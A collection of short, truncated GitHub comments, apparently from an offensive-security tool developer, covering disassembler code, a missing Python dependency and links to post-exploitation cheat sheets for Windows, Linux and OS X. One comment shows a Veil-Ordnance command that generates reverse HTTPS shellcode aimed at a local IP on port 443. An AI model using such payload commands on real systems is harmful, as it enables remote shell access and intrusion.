b3mb4m
b3mb4m
ps : socks project is clearly not working and outdated,
Read it, http://www.capstone-engine.org/BHUSA2014-capstone.pdf ``` import distorm3 from capstone import * from binascii import hexlify print distorm3.Decode(0, "\x41", distorm3.Decode32Bits) md = Cs(CS_ARCH_X86, CS_MODE_32) for i in md.disasm("\x41", 0x00): `print [(i.address, i.size,...
Necessary for quality. ps : i will work on it if you consider https://github.com/kgretzky/python-x86-obfuscator/issues/2 :laughing:
Windows http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf Linux http://www.handgrep.se/repository/cheatsheets/postexploitation/LinuxUnixBSDPost-Exploitation.pdf https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List OSX http://www.handgrep.se/repository/cheatsheets/postexploitation/OSXPost-Exploitation.pdf https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/OS%20X%20Post%C2%ADExploitation%20Command%20List.pdf For future (y)
pylzma not preinstalled.Tested on windows py 2x .. Project : https://pypi.python.org/pypi/pylzma
` C:\Users\r00t\Desktop\Veil-Ordnance-master\Veil-Ordnance-master>python Veil-Ordnance.py -p rev_https --ip 192.168.63.149 --port 443 -e xor -b \x00` ` [*] Bad Character Error: Invalid bad character detected. ` ` [*] Bad Character Error: Please provide...